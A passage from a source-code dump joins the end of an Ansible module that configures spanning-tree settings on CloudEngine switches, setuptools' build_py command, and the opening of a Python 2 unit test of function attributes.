                    msg='Error: Can not find tc-protection interval on the device.')
            self.cur_cfg["tc_protection_interval"] = tmp_value[0]
            self.existing["tc_protection_interval"] = tmp_value[0]
        else:
            self.cur_cfg["tc_protection_interval"] = "null"
            self.existing["tc_protection_interval"] = "null"

    if self.tc_protection_threshold:
        if "stp tc-protection threshold" in self.stp_cfg:
            tmp_value = re.findall(r'stp tc-protection threshold (.*)', self.stp_cfg)
            if not tmp_value:
                self.module.fail_json(
                    msg='Error: Can not find tc-protection threshold on the device.')
            self.cur_cfg["tc_protection_threshold"] = tmp_value[0]
            self.existing["tc_protection_threshold"] = tmp_value[0]
        else:
            # Device default threshold is 1 when not configured.
            self.cur_cfg["tc_protection_threshold"] = "1"
            self.existing["tc_protection_threshold"] = "1"

    if self.cost:
        tmp_value = re.findall(r'stp instance (.*) cost (.*)', self.interface_stp_cfg)
        if not tmp_value:
            self.cur_cfg["cost"] = "null"
            self.existing["cost"] = "null"
        else:
            self.cur_cfg["cost"] = tmp_value[0][1]
            self.existing["cost"] = tmp_value[0][1]

    # root_protection and loop_protection should get configuration at the
    # same time, because present_stp() cross-checks them for conflicts.
    if self.root_protection or self.loop_protection:
        if "stp root-protection" in self.interface_stp_cfg:
            self.cur_cfg["root_protection"] = "enable"
            self.existing["root_protection"] = "enable"
        else:
            self.cur_cfg["root_protection"] = "disable"
            self.existing["root_protection"] = "disable"
        if "stp loop-protection" in self.interface_stp_cfg:
            self.cur_cfg["loop_protection"] = "enable"
            self.existing["loop_protection"] = "enable"
        else:
            self.cur_cfg["loop_protection"] = "disable"
            self.existing["loop_protection"] = "disable"
def get_end_state(self):
    """Re-read the device after changes and record it in ``end_state``.

    Mirrors get_existing(), but only fills ``self.end_state``.
    """

    self.cli_get_stp_config()
    if self.interface and self.interface != "all":
        self.cli_get_interface_stp_config()

    if self.stp_mode:
        if "stp mode stp" in self.stp_cfg:
            self.end_state["stp_mode"] = "stp"
        elif "stp mode rstp" in self.stp_cfg:
            self.end_state["stp_mode"] = "rstp"
        else:
            self.end_state["stp_mode"] = "mstp"

    if self.stp_enable:
        if "stp disable" in self.stp_cfg:
            self.end_state["stp_enable"] = "disable"
        else:
            self.end_state["stp_enable"] = "enable"

    if self.stp_converge:
        if "stp converge fast" in self.stp_cfg:
            self.end_state["stp_converge"] = "fast"
        else:
            self.end_state["stp_converge"] = "normal"

    if self.edged_port:
        if self.interface == "all":
            if "stp edged-port default" in self.stp_cfg:
                self.end_state["edged_port"] = "enable"
            else:
                self.end_state["edged_port"] = "disable"
        else:
            if "stp edged-port enable" in self.interface_stp_cfg:
                self.end_state["edged_port"] = "enable"
            else:
                self.end_state["edged_port"] = "disable"

    if self.bpdu_filter:
        if self.interface == "all":
            if "stp bpdu-filter default" in self.stp_cfg:
                self.end_state["bpdu_filter"] = "enable"
            else:
                self.end_state["bpdu_filter"] = "disable"
        else:
            if "stp bpdu-filter enable" in self.interface_stp_cfg:
                self.end_state["bpdu_filter"] = "enable"
            else:
                self.end_state["bpdu_filter"] = "disable"

    if self.bpdu_protection:
        if "stp bpdu-protection" in self.stp_cfg:
            self.end_state["bpdu_protection"] = "enable"
        else:
            self.end_state["bpdu_protection"] = "disable"

    if self.tc_protection:
        if "stp tc-protection" in self.stp_cfg:
            self.end_state["tc_protection"] = "enable"
        else:
            self.end_state["tc_protection"] = "disable"

    if self.tc_protection_interval:
        if "stp tc-protection interval" in self.stp_cfg:
            tmp_value = re.findall(r'stp tc-protection interval (.*)', self.stp_cfg)
            if not tmp_value:
                self.module.fail_json(
                    msg='Error: Can not find tc-protection interval on the device.')
            self.end_state["tc_protection_interval"] = tmp_value[0]
        else:
            self.end_state["tc_protection_interval"] = "null"

    if self.tc_protection_threshold:
        if "stp tc-protection threshold" in self.stp_cfg:
            tmp_value = re.findall(r'stp tc-protection threshold (.*)', self.stp_cfg)
            if not tmp_value:
                self.module.fail_json(
                    msg='Error: Can not find tc-protection threshold on the device.')
            self.end_state["tc_protection_threshold"] = tmp_value[0]
        else:
            # Device default threshold is 1 when not configured.
            self.end_state["tc_protection_threshold"] = "1"

    if self.cost:
        tmp_value = re.findall(r'stp instance (.*) cost (.*)', self.interface_stp_cfg)
        if not tmp_value:
            self.end_state["cost"] = "null"
        else:
            self.end_state["cost"] = tmp_value[0][1]

    if self.root_protection:
        if "stp root-protection" in self.interface_stp_cfg:
            self.end_state["root_protection"] = "enable"
        else:
            self.end_state["root_protection"] = "disable"

    if self.loop_protection:
        if "stp loop-protection" in self.interface_stp_cfg:
            self.end_state["loop_protection"] = "enable"
        else:
            self.end_state["loop_protection"] = "disable"
def present_stp(self):
    """Apply the requested (state=present) STP configuration.

    Compares each requested option against ``self.cur_cfg`` and issues
    only the commands needed to converge; ``self.updates_cmd`` records
    what was sent for the module result.
    """

    cmds = list()

    # config global stp
    if self.stp_mode:
        if self.stp_mode != self.cur_cfg["stp_mode"]:
            cmd = "stp mode %s" % self.stp_mode
            cmds.append(cmd)
            self.updates_cmd.append(cmd)

    if self.stp_enable:
        if self.stp_enable != self.cur_cfg["stp_enable"]:
            cmd = "stp %s" % self.stp_enable
            cmds.append(cmd)
            self.updates_cmd.append(cmd)

    if self.stp_converge:
        if self.stp_converge != self.cur_cfg["stp_converge"]:
            cmd = "stp converge %s" % self.stp_converge
            cmds.append(cmd)
            self.updates_cmd.append(cmd)

    # interface == "all" variants are global commands.
    if self.edged_port:
        if self.interface == "all":
            if self.edged_port != self.cur_cfg["edged_port"]:
                if self.edged_port == "enable":
                    cmd = "stp edged-port default"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)
                else:
                    cmd = "undo stp edged-port default"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)

    if self.bpdu_filter:
        if self.interface == "all":
            if self.bpdu_filter != self.cur_cfg["bpdu_filter"]:
                if self.bpdu_filter == "enable":
                    cmd = "stp bpdu-filter default"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)
                else:
                    cmd = "undo stp bpdu-filter default"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)

    if self.bpdu_protection:
        if self.bpdu_protection != self.cur_cfg["bpdu_protection"]:
            if self.bpdu_protection == "enable":
                cmd = "stp bpdu-protection"
                cmds.append(cmd)
                self.updates_cmd.append(cmd)
            else:
                cmd = "undo stp bpdu-protection"
                cmds.append(cmd)
                self.updates_cmd.append(cmd)

    if self.tc_protection:
        if self.tc_protection != self.cur_cfg["tc_protection"]:
            if self.tc_protection == "enable":
                cmd = "stp tc-protection"
                cmds.append(cmd)
                self.updates_cmd.append(cmd)
            else:
                cmd = "undo stp tc-protection"
                cmds.append(cmd)
                self.updates_cmd.append(cmd)

    if self.tc_protection_interval:
        if self.tc_protection_interval != self.cur_cfg["tc_protection_interval"]:
            cmd = "stp tc-protection interval %s" % self.tc_protection_interval
            cmds.append(cmd)
            self.updates_cmd.append(cmd)

    if self.tc_protection_threshold:
        if self.tc_protection_threshold != self.cur_cfg["tc_protection_threshold"]:
            cmd = "stp tc-protection threshold %s" % self.tc_protection_threshold
            cmds.append(cmd)
            self.updates_cmd.append(cmd)

    # config interface stp
    if self.interface and self.interface != "all":
        tmp_changed = False

        # Enter the interface view first; removed again below if no
        # per-interface command was actually needed.
        cmd = "interface %s" % self.interface
        cmds.append(cmd)
        self.updates_cmd.append(cmd)

        if self.edged_port:
            if self.edged_port != self.cur_cfg["edged_port"]:
                if self.edged_port == "enable":
                    cmd = "stp edged-port enable"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)
                    tmp_changed = True
                else:
                    cmd = "undo stp edged-port"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)
                    tmp_changed = True

        if self.bpdu_filter:
            if self.bpdu_filter != self.cur_cfg["bpdu_filter"]:
                if self.bpdu_filter == "enable":
                    cmd = "stp bpdu-filter enable"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)
                    tmp_changed = True
                else:
                    cmd = "undo stp bpdu-filter"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)
                    tmp_changed = True

        if self.root_protection:
            # root-protection conflicts with an already-enabled
            # loop-protection on the same interface.
            if self.root_protection == "enable" and self.cur_cfg["loop_protection"] == "enable":
                self.module.fail_json(
                    msg='Error: The interface has enable loop_protection, can not enable root_protection.')
            if self.root_protection != self.cur_cfg["root_protection"]:
                if self.root_protection == "enable":
                    cmd = "stp root-protection"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)
                    tmp_changed = True
                else:
                    cmd = "undo stp root-protection"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)
                    tmp_changed = True

        if self.loop_protection:
            # loop-protection conflicts with an already-enabled
            # root-protection on the same interface.
            if self.loop_protection == "enable" and self.cur_cfg["root_protection"] == "enable":
                self.module.fail_json(
                    msg='Error: The interface has enable root_protection, can not enable loop_protection.')
            if self.loop_protection != self.cur_cfg["loop_protection"]:
                if self.loop_protection == "enable":
                    cmd = "stp loop-protection"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)
                    tmp_changed = True
                else:
                    cmd = "undo stp loop-protection"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)
                    tmp_changed = True

        if self.cost:
            if self.cost != self.cur_cfg["cost"]:
                cmd = "stp cost %s" % self.cost
                cmds.append(cmd)
                self.updates_cmd.append(cmd)
                tmp_changed = True

        # No per-interface change: drop the now-useless "interface" entry.
        if not tmp_changed:
            cmd = "interface %s" % self.interface
            self.updates_cmd.remove(cmd)
            cmds.remove(cmd)

    if cmds:
        self.cli_load_config(cmds)
        self.changed = True
def absent_stp(self):
    """ Absent stp configuration """
    # Builds the CLI command list that removes/reverts the requested STP
    # settings. Global settings are undone only when the current device
    # value matches the requested one; interface-level settings are handled
    # in a dedicated "interface <name>" section at the end.
    cmds = list()
    if self.stp_mode:
        if self.stp_mode == self.cur_cfg["stp_mode"]:
            if self.stp_mode != "mstp":
                # NOTE(review): no undo is issued for "mstp" — presumably the
                # device default mode; confirm against CE documentation.
                cmd = "undo stp mode"
                cmds.append(cmd)
                self.updates_cmd.append(cmd)
                self.changed = True
    if self.stp_enable:
        # Enable/disable is toggled (not undone) when it differs from the
        # current state.
        if self.stp_enable != self.cur_cfg["stp_enable"]:
            cmd = "stp %s" % self.stp_enable
            cmds.append(cmd)
            self.updates_cmd.append(cmd)
    if self.stp_converge:
        if self.stp_converge == self.cur_cfg["stp_converge"]:
            cmd = "undo stp converge"
            cmds.append(cmd)
            self.updates_cmd.append(cmd)
            self.changed = True
    if self.edged_port:
        # interface == "all" targets the global default; a specific interface
        # is handled in the per-interface section below.
        if self.interface == "all":
            if self.edged_port != self.cur_cfg["edged_port"]:
                if self.edged_port == "enable":
                    cmd = "stp edged-port default"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)
                else:
                    cmd = "undo stp edged-port default"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)
    if self.bpdu_filter:
        if self.interface == "all":
            if self.bpdu_filter != self.cur_cfg["bpdu_filter"]:
                if self.bpdu_filter == "enable":
                    cmd = "stp bpdu-filter default"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)
                else:
                    cmd = "undo stp bpdu-filter default"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)
    if self.bpdu_protection:
        if self.bpdu_protection != self.cur_cfg["bpdu_protection"]:
            if self.bpdu_protection == "enable":
                cmd = "stp bpdu-protection"
                cmds.append(cmd)
                self.updates_cmd.append(cmd)
            else:
                cmd = "undo stp bpdu-protection"
                cmds.append(cmd)
                self.updates_cmd.append(cmd)
    if self.tc_protection:
        if self.tc_protection != self.cur_cfg["tc_protection"]:
            if self.tc_protection == "enable":
                cmd = "stp tc-protection"
                cmds.append(cmd)
                self.updates_cmd.append(cmd)
            else:
                cmd = "undo stp tc-protection"
                cmds.append(cmd)
                self.updates_cmd.append(cmd)
    if self.tc_protection_interval:
        if self.tc_protection_interval == self.cur_cfg["tc_protection_interval"]:
            cmd = "undo stp tc-protection interval"
            cmds.append(cmd)
            self.updates_cmd.append(cmd)
            self.changed = True
    if self.tc_protection_threshold:
        if self.tc_protection_threshold == self.cur_cfg["tc_protection_threshold"]:
            if self.tc_protection_threshold != "1":
                # NOTE(review): "1" appears to be the device default
                # threshold, hence no undo for it — confirm.
                cmd = "undo stp tc-protection threshold"
                cmds.append(cmd)
                self.updates_cmd.append(cmd)
                self.changed = True
    # undo interface stp
    if self.interface and self.interface != "all":
        # Per-interface section: enter interface view first, then revert the
        # interface-level settings. tmp_changed tracks whether anything was
        # actually emitted inside the interface view.
        tmp_changed = False
        cmd = "interface %s" % self.interface
        cmds.append(cmd)
        self.updates_cmd.append(cmd)
        if self.edged_port:
            if self.edged_port != self.cur_cfg["edged_port"]:
                if self.edged_port == "enable":
                    cmd = "stp edged-port enable"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)
                    tmp_changed = True
                else:
                    cmd = "undo stp edged-port"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)
                    tmp_changed = True
        if self.bpdu_filter:
            if self.bpdu_filter != self.cur_cfg["bpdu_filter"]:
                if self.bpdu_filter == "enable":
                    cmd = "stp bpdu-filter enable"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)
                    tmp_changed = True
                else:
                    cmd = "undo stp bpdu-filter"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)
                    tmp_changed = True
        if self.root_protection:
            # root-protection and loop-protection are mutually exclusive on
            # an interface, hence the cross-checks before changing either.
            if self.root_protection == "enable" and self.cur_cfg["loop_protection"] == "enable":
                self.module.fail_json(
                    msg='Error: The interface has enable loop_protection, can not enable root_protection.')
            if self.root_protection != self.cur_cfg["root_protection"]:
                if self.root_protection == "enable":
                    cmd = "stp root-protection"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)
                    tmp_changed = True
                else:
                    cmd = "undo stp root-protection"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)
                    tmp_changed = True
        if self.loop_protection:
            if self.loop_protection == "enable" and self.cur_cfg["root_protection"] == "enable":
                self.module.fail_json(
                    msg='Error: The interface has enable root_protection, can not enable loop_protection.')
            if self.loop_protection != self.cur_cfg["loop_protection"]:
                if self.loop_protection == "enable":
                    cmd = "stp loop-protection"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)
                    tmp_changed = True
                else:
                    cmd = "undo stp loop-protection"
                    cmds.append(cmd)
                    self.updates_cmd.append(cmd)
                    tmp_changed = True
        if self.cost:
            if self.cost == self.cur_cfg["cost"]:
                cmd = "undo stp cost"
                cmds.append(cmd)
                self.updates_cmd.append(cmd)
                tmp_changed = True
        if not tmp_changed:
            # Nothing interface-level was emitted: drop the now-useless
            # "interface <name>" entry from both command lists again.
            cmd = "interface %s" % self.interface
            self.updates_cmd.remove(cmd)
            cmds.remove(cmd)
    if cmds:
        self.cli_load_config(cmds)
        self.changed = True
def work(self):
    """ Work function """
    # Entry point invoked from main(): validate parameters, compute the
    # proposed and existing state, apply the configuration for the requested
    # state, then report the outcome through the Ansible module exit.
    self.check_params()
    self.get_proposed()
    self.get_existing()
    if self.state == "present":
        self.present_stp()
    else:
        self.absent_stp()
    self.get_end_state()
    self.results['changed'] = self.changed
    self.results['proposed'] = self.proposed
    self.results['existing'] = self.existing
    self.results['end_state'] = self.end_state
    self.results['updates'] = self.updates_cmd
    self.module.exit_json(**self.results)
def main():
    """ Module main: declare the argument spec and run the Stp module. """
    # Argument specification for the CloudEngine STP module; merged with the
    # common CloudEngine connection arguments before instantiation.
    argument_spec = {
        'state': dict(choices=['present', 'absent'], default='present'),
        'stp_mode': dict(choices=['stp', 'rstp', 'mstp']),
        'stp_enable': dict(choices=['enable', 'disable']),
        'stp_converge': dict(choices=['fast', 'normal']),
        'bpdu_protection': dict(choices=['enable', 'disable']),
        'tc_protection': dict(choices=['enable', 'disable']),
        'tc_protection_interval': dict(type='str'),
        'tc_protection_threshold': dict(type='str'),
        'interface': dict(type='str'),
        'edged_port': dict(choices=['enable', 'disable']),
        'bpdu_filter': dict(choices=['enable', 'disable']),
        'cost': dict(type='str'),
        'root_protection': dict(choices=['enable', 'disable']),
        'loop_protection': dict(choices=['enable', 'disable']),
    }
    argument_spec.update(ce_argument_spec)
    module = Stp(argument_spec=argument_spec)
    module.work()


if __name__ == '__main__':
    main()
| gpl-3.0 |
nagnath006/Soccer-Analytics | Soccer-Analytics/Lib/site-packages/setuptools/command/build_py.py | 231 | 9596 | from glob import glob
from distutils.util import convert_path
import distutils.command.build_py as orig
import os
import fnmatch
import textwrap
import io
import distutils.errors
import itertools
from setuptools.extern import six
from setuptools.extern.six.moves import map, filter, filterfalse
try:
    from setuptools.lib2to3_ex import Mixin2to3
except ImportError:
    # lib2to3 support is optional: fall back to a no-op mixin so that
    # build_py still works when 2to3 conversion is unavailable.
    class Mixin2to3:
        def run_2to3(self, files, doctests=True):
            "do nothing"
class build_py(orig.build_py, Mixin2to3):
    """Enhanced 'build_py' command that includes data files with packages

    The data files are specified via a 'package_data' argument to 'setup()'.
    See 'setuptools.dist.Distribution' for more details.

    Also, this version of the 'build_py' command allows you to specify both
    'py_modules' and 'packages' in the same setup operation.
    """

    def finalize_options(self):
        orig.build_py.finalize_options(self)
        self.package_data = self.distribution.package_data
        self.exclude_package_data = (self.distribution.exclude_package_data or
                                     {})
        # 'data_files' is computed lazily via __getattr__; drop any cached
        # value so it is recomputed after options change.
        if 'data_files' in self.__dict__:
            del self.__dict__['data_files']
        self.__updated_files = []
        self.__doctests_2to3 = []

    def run(self):
        """Build modules, packages, and copy data files to build directory"""
        if not self.py_modules and not self.packages:
            return

        if self.py_modules:
            self.build_modules()

        if self.packages:
            self.build_packages()
            self.build_package_data()

        # Run 2to3 over the copied sources: once for code, once for doctests
        # embedded in those files, and once for files flagged as doctests.
        self.run_2to3(self.__updated_files, False)
        self.run_2to3(self.__updated_files, True)
        self.run_2to3(self.__doctests_2to3, True)

        # Only compile actual .py files, using our base class' idea of what our
        # output files are.
        self.byte_compile(orig.build_py.get_outputs(self, include_bytecode=0))

    def __getattr__(self, attr):
        "lazily compute data files"
        if attr == 'data_files':
            self.data_files = self._get_data_files()
            return self.data_files
        return orig.build_py.__getattr__(self, attr)

    def build_module(self, module, module_file, package):
        if six.PY2 and isinstance(package, six.string_types):
            # avoid errors on Python 2 when unicode is passed (#190)
            package = package.split('.')
        outfile, copied = orig.build_py.build_module(self, module, module_file,
                                                     package)
        if copied:
            # Remember copied modules so run() can feed them to 2to3.
            self.__updated_files.append(outfile)
        return outfile, copied

    def _get_data_files(self):
        """Generate list of '(package,src_dir,build_dir,filenames)' tuples"""
        self.analyze_manifest()
        return list(map(self._get_pkg_data_files, self.packages or ()))

    def _get_pkg_data_files(self, package):
        # Locate package source directory
        src_dir = self.get_package_dir(package)

        # Compute package build directory
        build_dir = os.path.join(*([self.build_lib] + package.split('.')))

        # Strip directory from globbed filenames
        filenames = [
            os.path.relpath(file, src_dir)
            for file in self.find_data_files(package, src_dir)
        ]
        return package, src_dir, build_dir, filenames

    def find_data_files(self, package, src_dir):
        """Return filenames for package's data files in 'src_dir'"""
        patterns = self._get_platform_patterns(
            self.package_data,
            package,
            src_dir,
        )
        globs_expanded = map(glob, patterns)
        # flatten the expanded globs into an iterable of matches
        globs_matches = itertools.chain.from_iterable(globs_expanded)
        glob_files = filter(os.path.isfile, globs_matches)
        files = itertools.chain(
            self.manifest_files.get(package, []),
            glob_files,
        )
        return self.exclude_data_files(package, src_dir, files)

    def build_package_data(self):
        """Copy data files into build directory"""
        for package, src_dir, build_dir, filenames in self.data_files:
            for filename in filenames:
                target = os.path.join(build_dir, filename)
                self.mkpath(os.path.dirname(target))
                srcfile = os.path.join(src_dir, filename)
                outf, copied = self.copy_file(srcfile, target)
                srcfile = os.path.abspath(srcfile)
                # Data files explicitly listed as doctest sources also get
                # queued for 2to3 doctest conversion.
                if (copied and
                        srcfile in self.distribution.convert_2to3_doctests):
                    self.__doctests_2to3.append(outf)

    def analyze_manifest(self):
        self.manifest_files = mf = {}
        if not self.distribution.include_package_data:
            return
        src_dirs = {}
        for package in self.packages or ():
            # Locate package source directory
            src_dirs[assert_relative(self.get_package_dir(package))] = package

        self.run_command('egg_info')
        ei_cmd = self.get_finalized_command('egg_info')
        for path in ei_cmd.filelist.files:
            d, f = os.path.split(assert_relative(path))
            prev = None
            oldf = f
            # Walk up the directory tree until we reach a known package
            # source dir (or the top), re-joining the stripped components
            # onto the filename as we go.
            while d and d != prev and d not in src_dirs:
                prev = d
                d, df = os.path.split(d)
                f = os.path.join(df, f)
            if d in src_dirs:
                if path.endswith('.py') and f == oldf:
                    continue  # it's a module, not data
                mf.setdefault(src_dirs[d], []).append(path)

    def get_data_files(self):
        pass  # Lazily compute data files in _get_data_files() function.

    def check_package(self, package, package_dir):
        """Check namespace packages' __init__ for declare_namespace"""
        try:
            return self.packages_checked[package]
        except KeyError:
            pass

        init_py = orig.build_py.check_package(self, package, package_dir)
        self.packages_checked[package] = init_py

        if not init_py or not self.distribution.namespace_packages:
            return init_py

        # Only validate packages that are (or contain) declared namespaces.
        for pkg in self.distribution.namespace_packages:
            if pkg == package or pkg.startswith(package + '.'):
                break
        else:
            return init_py

        with io.open(init_py, 'rb') as f:
            contents = f.read()
        if b'declare_namespace' not in contents:
            raise distutils.errors.DistutilsError(
                "Namespace package problem: %s is a namespace package, but "
                "its\n__init__.py does not call declare_namespace()! Please "
                'fix it.\n(See the setuptools manual under '
                '"Namespace Packages" for details.)\n"' % (package,)
            )
        return init_py

    def initialize_options(self):
        self.packages_checked = {}
        orig.build_py.initialize_options(self)

    def get_package_dir(self, package):
        res = orig.build_py.get_package_dir(self, package)
        if self.distribution.src_root is not None:
            return os.path.join(self.distribution.src_root, res)
        return res

    def exclude_data_files(self, package, src_dir, files):
        """Filter filenames for package's data files in 'src_dir'"""
        files = list(files)
        patterns = self._get_platform_patterns(
            self.exclude_package_data,
            package,
            src_dir,
        )
        match_groups = (
            fnmatch.filter(files, pattern)
            for pattern in patterns
        )
        # flatten the groups of matches into an iterable of matches
        matches = itertools.chain.from_iterable(match_groups)
        bad = set(matches)
        keepers = (
            fn
            for fn in files
            if fn not in bad
        )
        # ditch dupes
        return list(_unique_everseen(keepers))

    @staticmethod
    def _get_platform_patterns(spec, package, src_dir):
        """
        yield platform-specific path patterns (suitable for glob
        or fn_match) from a glob-based spec (such as
        self.package_data or self.exclude_package_data)
        matching package in src_dir.
        """
        raw_patterns = itertools.chain(
            spec.get('', []),
            spec.get(package, []),
        )
        return (
            # Each pattern has to be converted to a platform-specific path
            os.path.join(src_dir, convert_path(pattern))
            for pattern in raw_patterns
        )
# from Python docs
def _unique_everseen(iterable, key=None):
"List unique elements, preserving order. Remember all elements ever seen."
# unique_everseen('AAAABBBCCDAABBB') --> A B C D
# unique_everseen('ABBCcAD', str.lower) --> A B C D
seen = set()
seen_add = seen.add
if key is None:
for element in filterfalse(seen.__contains__, iterable):
seen_add(element)
yield element
else:
for element in iterable:
k = key(element)
if k not in seen:
seen_add(k)
yield element
def assert_relative(path):
    """Return *path* unchanged if it is relative; abort setup if absolute."""
    if os.path.isabs(path):
        from distutils.errors import DistutilsSetupError

        template = textwrap.dedent("""
            Error: setup script specifies an absolute path:
                %s
            setup() arguments must *always* be /-separated paths relative to the
            setup.py directory, *never* absolute paths.
            """).lstrip()
        raise DistutilsSetupError(template % path)
    return path
| mpl-2.0 |
xyzz/vcmi-build | project/jni/python/src/Lib/test/test_funcattrs.py | 51 | 11403 | from test import test_support
import types
import unittest
class FuncAttrsTest(unittest.TestCase):
    """Shared fixture for the function-attribute tests below: a class with
    a method (self.f / self.fi) and a plain local function (self.b)."""

    def setUp(self):
        class F:
            def a(self):
                pass
        def b():
            return 3
        self.f = F
        self.fi = F()
        self.b = b

    def cannot_set_attr(self, obj, name, value, exceptions):
        # This method is not called as a test (name doesn't start with 'test'),
        # but may be used by other tests.
        # Asserts that both setting and deleting `name` on `obj` raise one of
        # `exceptions`.
        try: setattr(obj, name, value)
        except exceptions: pass
        else: self.fail("shouldn't be able to set %s to %r" % (name, value))
        try: delattr(obj, name)
        except exceptions: pass
        else: self.fail("shouldn't be able to del %s" % name)
class FunctionPropertiesTest(FuncAttrsTest):
    # Include the external setUp method that is common to all tests
    # Exercises the special (Python 2) function attributes: __module__,
    # func_code, func_globals, __name__/func_name, func_defaults.

    def test_module(self):
        self.assertEqual(self.b.__module__, __name__)

    def test_dir_includes_correct_attrs(self):
        self.b.known_attr = 7
        self.assert_('known_attr' in dir(self.b),
                     "set attributes not in dir listing of method")
        # Test on underlying function object of method
        self.f.a.im_func.known_attr = 7
        self.assert_('known_attr' in dir(self.f.a),
                     "set attribute on unbound method implementation in class not in "
                     "dir")
        self.assert_('known_attr' in dir(self.fi.a),
                     "set attribute on unbound method implementations, should show up"
                     " in next dir")

    def test_duplicate_function_equality(self):
        # Body of `duplicate' is the exact same as self.b
        def duplicate():
            'my docstring'
            return 3
        self.assertNotEqual(self.b, duplicate)

    def test_copying_func_code(self):
        def test(): pass
        self.assertEqual(test(), None)
        test.func_code = self.b.func_code
        self.assertEqual(test(), 3)  # self.b always returns 3, arbitrarily

    def test_func_globals(self):
        self.assertEqual(self.b.func_globals, globals())
        self.cannot_set_attr(self.b, 'func_globals', 2, TypeError)

    def test_func_name(self):
        # __name__ and func_name are writable aliases of each other.
        self.assertEqual(self.b.__name__, 'b')
        self.assertEqual(self.b.func_name, 'b')
        self.b.__name__ = 'c'
        self.assertEqual(self.b.__name__, 'c')
        self.assertEqual(self.b.func_name, 'c')
        self.b.func_name = 'd'
        self.assertEqual(self.b.__name__, 'd')
        self.assertEqual(self.b.func_name, 'd')
        # __name__ and func_name must be a string
        self.cannot_set_attr(self.b, '__name__', 7, TypeError)
        self.cannot_set_attr(self.b, 'func_name', 7, TypeError)
        # __name__ must be available when in restricted mode. Exec will raise
        # AttributeError if __name__ is not available on f.
        s = """def f(): pass\nf.__name__"""
        exec s in {'__builtins__': {}}
        # Test on methods, too
        self.assertEqual(self.f.a.__name__, 'a')
        self.assertEqual(self.fi.a.__name__, 'a')
        self.cannot_set_attr(self.f.a, "__name__", 'a', AttributeError)
        self.cannot_set_attr(self.fi.a, "__name__", 'a', AttributeError)

    def test_func_code(self):
        # func_code may be swapped between functions, but only when the
        # number of free variables matches.
        num_one, num_two = 7, 8
        def a(): pass
        def b(): return 12
        def c(): return num_one
        def d(): return num_two
        def e(): return num_one, num_two
        for func in [a, b, c, d, e]:
            self.assertEqual(type(func.func_code), types.CodeType)
        self.assertEqual(c(), 7)
        self.assertEqual(d(), 8)
        d.func_code = c.func_code
        self.assertEqual(c.func_code, d.func_code)
        self.assertEqual(c(), 7)
        # self.assertEqual(d(), 7)
        try: b.func_code = c.func_code
        except ValueError: pass
        else: self.fail(
            "func_code with different numbers of free vars should not be "
            "possible")
        try: e.func_code = d.func_code
        except ValueError: pass
        else: self.fail(
            "func_code with different numbers of free vars should not be "
            "possible")

    def test_blank_func_defaults(self):
        self.assertEqual(self.b.func_defaults, None)
        del self.b.func_defaults
        self.assertEqual(self.b.func_defaults, None)

    def test_func_default_args(self):
        def first_func(a, b):
            return a+b
        def second_func(a=1, b=2):
            return a+b
        self.assertEqual(first_func.func_defaults, None)
        self.assertEqual(second_func.func_defaults, (1, 2))
        first_func.func_defaults = (1, 2)
        self.assertEqual(first_func.func_defaults, (1, 2))
        self.assertEqual(first_func(), 3)
        self.assertEqual(first_func(3), 5)
        self.assertEqual(first_func(3, 5), 8)
        del second_func.func_defaults
        self.assertEqual(second_func.func_defaults, None)
        try: second_func()
        except TypeError: pass
        else: self.fail(
            "func_defaults does not update; deleting it does not remove "
            "requirement")
class ImplicitReferencesTest(FuncAttrsTest):
    """Read-only (Python 2) method attributes: im_class, im_func, im_self."""

    def test_im_class(self):
        self.assertEqual(self.f.a.im_class, self.f)
        self.assertEqual(self.fi.a.im_class, self.f)
        self.cannot_set_attr(self.f.a, "im_class", self.f, TypeError)
        self.cannot_set_attr(self.fi.a, "im_class", self.f, TypeError)

    def test_im_func(self):
        self.f.b = self.b
        self.assertEqual(self.f.b.im_func, self.b)
        self.assertEqual(self.fi.b.im_func, self.b)
        self.cannot_set_attr(self.f.b, "im_func", self.b, TypeError)
        self.cannot_set_attr(self.fi.b, "im_func", self.b, TypeError)

    def test_im_self(self):
        # im_self is None for unbound methods, the instance for bound ones.
        self.assertEqual(self.f.a.im_self, None)
        self.assertEqual(self.fi.a.im_self, self.fi)
        self.cannot_set_attr(self.f.a, "im_self", None, TypeError)
        self.cannot_set_attr(self.fi.a, "im_self", self.fi, TypeError)

    def test_im_func_non_method(self):
        # Behavior should be the same when a method is added via an attr
        # assignment
        self.f.id = types.MethodType(id, None, self.f)
        self.assertEqual(self.fi.id(), id(self.fi))
        self.assertNotEqual(self.fi.id(), id(self.f))
        # Test usage
        try: self.f.id.unknown_attr
        except AttributeError: pass
        else: self.fail("using unknown attributes should raise AttributeError")
        # Test assignment and deletion
        self.cannot_set_attr(self.f.id, 'unknown_attr', 2, AttributeError)
        self.cannot_set_attr(self.fi.id, 'unknown_attr', 2, AttributeError)

    def test_implicit_method_properties(self):
        self.f.a.im_func.known_attr = 7
        self.assertEqual(self.f.a.known_attr, 7)
        self.assertEqual(self.fi.a.known_attr, 7)
class ArbitraryFunctionAttrTest(FuncAttrsTest):
    """Setting, deleting and reading arbitrary attributes: allowed on plain
    functions, rejected on bound/unbound method objects."""

    def test_set_attr(self):
        # Plain functions accept arbitrary attributes...
        self.b.known_attr = 7
        self.assertEqual(self.b.known_attr, 7)
        # ...but (un)bound method objects reject them.
        for func in [self.f.a, self.fi.a]:
            try: func.known_attr = 7
